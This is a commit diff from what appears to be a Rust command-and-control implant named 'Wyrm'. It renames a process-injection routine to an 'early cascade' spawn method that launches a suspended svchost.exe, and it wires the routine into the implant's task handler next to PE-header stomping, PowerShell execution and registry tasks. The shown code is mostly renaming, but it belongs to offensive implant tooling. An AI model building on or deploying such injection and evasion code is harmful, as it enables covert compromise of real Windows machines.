Be consistent with naming conventions

This commit is contained in:
flux
2025-12-26 11:13:42 +00:00
parent 34f20f2914
commit f2adfa35e6
3 changed files with 24 additions and 10 deletions
@@ -25,12 +25,12 @@ use windows_sys::Win32::{
},
};
use crate::{dbgprint, utils::pe_stomp::stomp_pe_header_bytes};
use crate::utils::pe_stomp::stomp_pe_header_bytes;
// TODO move to profile &/ default?
const SPAWN_AS_IMAGE: &'static [u8; 32] = b"C:\\Windows\\System32\\svchost.exe\0";
pub(super) fn spawn_sibling(mut buf: Vec<u8>) -> WyrmResult<String> {
pub(super) fn early_cascade_spawn_child(mut buf: Vec<u8>) -> WyrmResult<String> {
//
// Create the process in a suspended state, using the image specified by either the user (TODO) or
// svchost as the default image.
+16 -6
View File
@@ -1,6 +1,5 @@
use std::{
fs::{self, File},
io::Read,
fs::{self},
path::PathBuf,
};
@@ -8,15 +7,23 @@ use shared::tasks::WyrmResult;
use crate::{
native::filesystem::{PathParseType, parse_path},
spawn::hollow_apc::spawn_sibling,
spawn::early_cascade::early_cascade_spawn_child,
};
pub mod hollow_apc;
pub mod early_cascade;
pub enum SpawnMethod {
EarlyCascade,
}
pub struct Spawn;
impl Spawn {
pub fn spawn_sibling(path: &str, implant_working_dir: &PathBuf) -> WyrmResult<String> {
pub fn spawn_child(
path: &str,
implant_working_dir: &PathBuf,
method: SpawnMethod,
) -> WyrmResult<String> {
let path = match parse_path(path, implant_working_dir, PathParseType::File) {
WyrmResult::Ok(p) => p,
WyrmResult::Err(e) => {
@@ -30,6 +37,9 @@ impl Spawn {
let Ok(buf) = fs::read(path) else {
return WyrmResult::Err(format!("Could not read file"));
};
spawn_sibling(buf)
match method {
SpawnMethod::EarlyCascade => early_cascade_spawn_child(buf),
}
}
}
+6 -2
View File
@@ -48,7 +48,7 @@ use crate::{
registry::{reg_add, reg_del, reg_query},
shell::run_powershell,
},
spawn::Spawn,
spawn::{Spawn, SpawnMethod},
utils::{
comptime::translate_build_artifacts, proxy::resolve_web_proxy,
strings::generate_mutex_name, svc_controls::stop_svc_and_exit, time_utils::epoch_now,
@@ -333,7 +333,11 @@ impl Wyrm {
}
Command::Spawn => {
let path = task.metadata.unwrap();
Spawn::spawn_sibling(&path, &self.current_working_directory);
Spawn::spawn_child(
&path,
&self.current_working_directory,
SpawnMethod::EarlyCascade,
);
}
}
}